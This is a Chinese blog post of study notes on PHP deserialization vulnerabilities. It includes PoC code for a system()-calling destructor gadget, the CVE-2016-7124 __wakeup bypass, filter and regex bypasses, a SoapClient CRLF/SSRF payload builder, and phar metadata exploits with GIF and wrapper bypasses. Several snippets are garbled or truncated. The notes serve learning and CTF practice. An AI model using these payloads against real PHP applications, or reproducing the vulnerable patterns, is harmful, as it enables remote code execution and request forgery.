php反序列化java_php反序列化

最新推荐文章于 2022-08-26 16:55:13 发布
最新推荐文章于 2022-08-26 16:55:13 发布
阅读量223 收藏
点赞数
文章标签: php反序列化java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_34060672/article/details/114620064
版权

php反序列化相关知识的笔记

一、简介

意义在于能把一个结构抽象的东西转变为易于传输的字符串,如数组、对象。

serialize($a):把$a序列化

unserialize($a):把$a反序列化

类型(:长度):内容 ,例如:

serialize(“aaaaa”) ---> s:5:"aaaaa";serialize(123) ---> i:123;serialize(True) ---> b:1;serialize(array('a'=>'b')) --> a:1:{s:1:"a";s:1:"b";}

序列化后的内容只有成员变量,没有成员函数。如下:

shellydeMacBook-Pro:~ shellyzhang$ cat 2.php<?php

class test{

public $a;

public $b;function __construct(){$this->a = "abc";$this->b="efg";}function abc(){return $this->a;}

}

$a=new test();echoserialize($a);?>

shellydeMacBook-Pro:~ shellyzhang$ php 2.php

O:4:"test":2:{s:1:"a";s:3:"abc";s:1:"b";s:3:"efg";}

protected型会在变量名前加上\x00*\x00,private型会在变量名前加上\x00类名\x00,输出时记得url编码。如下:

shellydeMacBook-Pro:~ shellyzhang$ cat 2.php<?php

class test{

protected $a;

private $b;function __construct(){$this->a = "abc";$this->b="efg";}

}

$a=new test();echourlencode(serialize($a));?>shellydeMacBook-Pro:~ shellyzhang$ php 2.php

O%3A4%3A%22test%22%3A2%3A%7Bs%3A4%3A%22%00%2A%00a%22%3Bs%3A3%3A%22abc%22%3Bs%3A7%3A%22%00test%00b%22%3Bs%3A3%3A%22efg%22%3B%7D

shellydeMacBook-Pro:~shellyzhang$

shellydeMacBook-Pro:~ shellyzhang$ python3 -c "import urllib.parse;print(urllib.parse.unquote('O%3A4%3A%22test%22%3A2%3A%7Bs%3A4%3A%22%00%2A%00a%22%3Bs%3A3%3A%22abc%22%3Bs%3A7%3A%22%00test%00b%22%3Bs%3A3%3A%22efg%22%3B%7D'))"O:4:"test":2:{s:4:"*a";s:3:"abc";s:7:"testb";s:3:"efg";}

二、漏洞成因

php的魔术方法中含有或会调用到危险的函数,同时函数变量又是用户可控的。如下,需要注意的是,__destruct的工作目录会被切换为系统根目录:

shellydeMacBook-Pro:~ shellyzhang$ cat 2.php<?php

class test{

public $a;function__destruct(){

system($this->a);

}

}

unserialize('O:4:"test":1:{s:1:"a";s:3:"pwd";}');?>shellydeMacBook-Pro:~ shellyzhang$ php 2.php/Users/shellyzhang

常用的php魔术方法,如下:

__construct(),类的构造函数

__destruct(),类的析构函数

__call(),在对象中调用一个不可访问方法时调用 如:$a->xxx();

__get(),获得一个类的成员变量时调用 如:$a->xxx;

__set(),设置一个类的成员变量时调用

__sleep(),执行serialize()时,先会调用这个函数

__wakeup(),执行unserialize()时,先会调用这个函数

__toString(),类被当成字符串时的回应方法 如:echo $a;

__invoke(),调用函数的方式调用一个对象时的回应方法 $a();

三、反序列化绕过

1、绕过字符过滤

O:4:"test":2:{s:4:"%00*%00a";s:3:"abc";s:7:"%00test%00b";s:3:"efg";}

可以写成

O:4:"test":2:{S:4:"\00*\00\61";s:3:"abc";s:7:"%00test%00b";s:3:"efg";}

表示字符类型的s大写时,会被当成16进制解析。

2、绕过__wakeup

CVE-2016-7124

PHP5 < 5.6.25

PHP7 < 7.0.10

序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过__wakeup的执行

如下:

<?phpclasstest {public $a;function__wakeup(){$this->a='';

}function__destruct(){system($this->a);

}

}unserialize('O:4:"test":2:{s:1:"a";s:3:"pwd";}');?>

3、绕过部分正则

preg_match('/^O:\d+/')匹配序列化字符串是否是对象字符串开头

1. serialize(array($a));//$a为要反序列化的对象

序列化结果开头是a,不影响作为数组元素的$a的析构

2. O:+3:”aaa”....

利用加号绕过(注意在url里传参时+要编码为%2B)

4、利用引用

将$c设置为$b的引用,$test->c = &$test->b,可以使$c永远与$b相等

classtest{public $a;public $b;public $c;function__destruct(){$this->b='xxxxxx';if($this->c===$this->b){system($this->a);

}

}

}

四、PHP原生类反序列化(soap)

php在安装php-soap拓展后,可以反序列化原生类SoapClient,来发送http post请求。

必须调用SoapClient不存在的方法,触发SoapClient的__call魔术方法。

通过CRLF来添加请求体:SoapClient可以指定请求的user-agent头,通过添加换行符的形式来加入其他请求内容

'Cookie: PHPSESSID=3stu05dr969ogmprk28drnju93');$b = new SoapClient(null,array('location' => $target,'user_agent'=>'test^^Content-Type: application/x-www-form-urlencoded^^'.join('^^',$headers).'^^Content-Length: '.(string)strlen($post_string).'^^^^'.$post_string,'uri' => "notExistFunction"));$aaa = serialize($b);$aaa = str_replace('^^',"\r\n",$aaa);$aaa = str_replace('&','&',$aaa);echo urlencode($aaa);

五、phar反序列化

phar文件本质上是一种压缩文件,会以序列化的形式存储用户自定义的meta-data。当受影响的文件操作函数调用phar文件时,会自动反序列化meta-data内的内容。

参考:

知道创宇测试后受影响的函数列表:

c9a2187322de4ad967f31cff4d4f2d4a.png

基本poc如下,可使用此poc生成phar文件:

}

@unlink("phar.phar");$phar = new Phar("phar.phar"); //后缀名必须为phar

$phar->startBuffering();$phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置stub

$o = newTestObject();$phar->setMetadata($o); //将自定义的meta-data存入manifest

$phar->addFromString("test.txt", "test"); //添加要压缩的文件

//签名自动计算

$phar->stopBuffering();?>

相关绕过:

当环境限制了phar不能出现在前面的字符里。可以使用compress.bzip2://和compress.zlib://绕过

$z = 'compress.bzip2://phar:///home/sx/test.phar/test.txt';

$z = 'compress.zlib://phar:///home/sx/test.phar/test.txt';

当环境限制了phar不能出现在前面的字符里,还可以配合其他协议进行利用。

php://filter/read=convert.base64-encode/resource=phar://phar.phar

GIF格式验证可以通过在文件头部添加GIF89a绕过

1、$phar->setStub("GIF89a"."<?php __HALT_COMPILER(); ?>"); //设置stub

2、生成一个phar.phar,修改后缀名为phar.gif

一个简单的例子:phar.php

}$phar = new Phar("phar.phar"); //后缀名必须为phar

$phar->startBuffering();$phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置stub

$o = newTestObject();$o -> name='test'; //控制TestObject中的name变量为Threezh1

$phar->setMetadata($o); //将自定义的meta-data存入manifest

$phar->addFromString("test.txt", "test"); //添加要压缩的文件

//签名自动计算

$phar->stopBuffering();?>

index.php

{echo $this ->name;

}

}if ($_GET["file"]){file_exists($_GET["file"]);

}?>

使用php phar.php生成phar.phar文件。

访问:http://127.0.0.1/index.php?file=phar://phar.phar

返回:test。 反序列化利用成功。

那家伙是谁
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
第38天:WEB漏洞-反序列化PHP&JAVA全解(下)1
08-03
演示案例:Java 反序列化及命令执行代码测试WebGoat_Javaweb 靶场反序列化测试0x01 注入判断,获取管理员帐号密码:根据提示附件进行 java
[CTF]PHP反序列化总结
m0_55754984的博客
08-14 698
简介 序列化其实就是将数据转化成一种可逆的数据结构,自然,逆向的过程就叫做反序列化。 在网上找到一个比较形象的例子 比如:现在我们都会在淘宝上买桌子,桌子这种很不规则的东西,该怎么从一个城市运输到另一个城市,这时候一般都会把它拆掉成板子,再装到箱子里面,就可以快递寄出去了,这个过程就类似我们的序列化的过程(把数据转化为可以存储或者传输的形式)。当买家收到货后,就需要自己把这些板子组装成桌子的样子,这个过程就像反序列的过程(转化成当初的数据对象)。 php 将数据序列化和反序列化会用到两个函数 ser
web安全-PHP反序列化漏洞
weixin_61956136的博客
07-10 2052
web安全-PHP反序列化漏洞
网安学习-反序列化漏洞
weixin_44770698的博客
06-06 759
初始序列化漏洞
php 反序列化漏洞,PHP反序列化漏洞详解
weixin_35052140的博客
03-11 396
最近和小伙伴们一起研究了下PHP反序列化漏洞,突发奇想,利用反序列化漏洞写一个一句话木马效果应该蛮不错的。本文主要和大家分享PHP反序列化漏洞详解,希望能帮助到大家。0x01 PHP反序说起PHP反序列化,那必须先简单说一下PHP的序列化。PHP序列化是将一个对象、数组、字符串等转化为字节流便于传输,比如跨脚本等。而PHP反序列化是将序列化之后的字节流还原成对象、字符、数组等。但是PHP序列化是不...
原理+实践掌握(PHP反序列化和Session反序列化)
bylfsj的博客
03-22 1633
<p></p><h2 id="toc-0">前言:</h2> 最近又接触了几道php反序列化的题目,觉得对反序列化的理解又加深了一点,这次就在之前的学习的基础上进行补充。 0x00:PHP序列化 函数 : serialize() 所有php里面的值都可以使用函数serialize()来返回一个包含字节流的字符串来表...
java序列化对象传给php
01-17
android(包括java)序列化一个对象传给php去做处理,或是接到php的序列化的对象在java中做处理的工具jar包以及使用方法. 使用方法: byte[] b = null; b = PHPSerializer.serialize(一个对象);//将一个对象序列化后返回...
java 序列化成PHP格式。
08-18
java数据 序列化成PHP的格式 a:4:{s:6:"title2";s:13:"这是标题2";s:6:"title3";s:13:"这是标题3";s:5:"title";s:13:"这是标题1";s:6:"title4";s:13:"这是标题4";} 或者a:1:{i:0;a:1:{s:4:"name";s:10:"这是1321";...
PHP序列化/对象注入漏洞分析
12-18
本文是关于PHP序列化/对象注入漏洞分析的短篇,里面讲述了如何获取主机的远程shell。 如果你想自行测试这个漏洞,你可以通过 XVWA 和 Kevgir 进行操作。 漏洞利用的第一步,我们开始测试目标应用是否存在PHP序列化。...
phprpc.jar 包java 反序列化PHP工程demo
03-30
java 反序列化PHP ,java解析php序列化的字符串,工具包和工程实例
从一道CTF题学习PHP反序列化漏洞
Fly_鹏程万里
09-17 6255
一、CTF题目 前阵子,参加了一个CTF比赛,其中有一条道题蛮有意思的,所以写出来分享一下。 此题利用了PHP反序列化漏洞,通过构造特殊的Payload绕过__wakeup()魔术方法,从而实现注入目的,废话不多说,主要源码如下: class SoFun{ protected $file='index.php'; function __destruct(){ ...
PHP面试题汇总
丶拾慌
08-09 7262
最近一直在刷面试题,将看过的面试题整理一下。 基本语法 1.    PHP全称解释 答:Hypertext Preprocessor的缩写,超文本预处理器,是一种用来开发动态网站的服务器脚本语言。 2.    请说明PHP中传值和引用的区别。什么时候传值什么时候引用? 答:传值,函数范围内对值的任何改变在函数外部都会被忽略。 引用,函数范围内对值的任何改变在函数外部也能反映出这些修改。
PHP函数漏洞总结
柠檬木有枝
08-26 2392
前言 本文主要针对 PHP 函数相关的漏洞的总结,可能会偏向 CTF 方面,内容肯定不全,有空的话会持续更新,欢迎各位表哥补充以及对文章错误之处进行斧正! 1 弱类型安全问题 1.1 == 弱类型比较缺陷 === 在进行比较的时候,会先判断两种字符串的类型是否相等,再比较 == 在进行比较的时候,会先将字符串类型转化成相同,再比较 (1)字符串的开始部分决定了它的值,如果该字符串以合法的数值开始,则使用该数值,否则其值则为0 var_dump("admin"==0); //true var_dump("1a
反序列化整理
weixin_54225453的博客
08-26 159
PHP反序列化漏洞利用技术POP中,对应的初始化gadgets就是wakeup() 或者是destruct() 方法, 在最理想的情况下能够实现漏洞利用的点就在这两个函数中,但往往我们需要从这个函数开始,逐步的跟进在这个函数中调用到的所有函数,直至找到可以利用的点为止。在反序列化中,我们所能控制的数据就是对象中的各个属性值,所以在PHP反序列化有一种漏洞利用方法叫做 “面向属性编程” ,即 POP( Property Oriented Programming)。换句话说,将保留对象的属性及其分配的值。.
初遇php反序列化
h0ld1rs的博客
08-11 243
文章目录题目思路解法php反序列的知识点php魔术方法 攻防世界刷题时候,第一次刷到,所以记录一下 题目 <?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; //构造函数,对类的变量进行初始化 } function __destruct() { echo @highl
php反序列化construct绕过,PHP反序列化漏洞
weixin_39824801的博客
03-11 1619
在理解这个漏洞前,你需要先搞清楚php中serialize(),unserialize()这两个函数。序列化serialize()序列化说通俗点就是把一个对象变成可以传输的字符串,比如下面是一个对象:class S{public $test="pikachu";}$s=new S(); //创建一个对象serialize($s); //把这个对象进行序列化序列化后得到的结果是这个样子的:O:1:"...
php常用函数讲解,php常用函数处理的函数解析
weixin_33188832的博客
03-10 66
本篇将讲解php常用函数处理的函数解析。func_get_arg — 返回参数列表的某一项func_get_args — 返回一个包含函数参数列表的数组func_num_args — 返回传递给函数的参数个数call_user_func — 把第一个参数作为回调函数调用call_user_func_array —调用回调函数,并把一个数组参数作为回调函数的参数forward_static_call...
反序列化(Unserialize)题目讲解
qq_49422880的博客
10-05 5387
[RCTF2015]EasySQL 这道题没有什么思路,就是看网上的WP写出,Sql-lib好像也有这道题。这里要使用的一种注入方法叫做二次注入。具体我就不细讲了。 直接放语句上去: admin"||(updatexml(1,concat(0x7e,(select(database()))),1))# 123"||(updatexml(1,concat(0x7e,(select(database()))),1))# ...
sprintf()使用说明
Simple is perfect
11-16 5171
在将各种类型的数据构造成字符串时,sprintf 的强大功能很少会让你失望。由于sprintf 跟printf 在用法上几乎一样,只是打印的目的地不同而已,前者打印到字符串中,后者则直接在命令行上输出。这也导致sprintf 比printf 有用得多。sprintf 是个变参函数,定义如下:int sprintf( char *buffer, const char *format [, argum
存在反序列化漏洞的框架有哪些
最新发布
07-11
3. Java RMI(远程方法调用):Java RMI是Java中的远程调用机制,也存在反序列化漏洞。例如,Apache River框架在较旧版本中存在漏洞。 4. Java EE(Enterprise Edition):Java EE是一套用于开发企业级应用程序的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值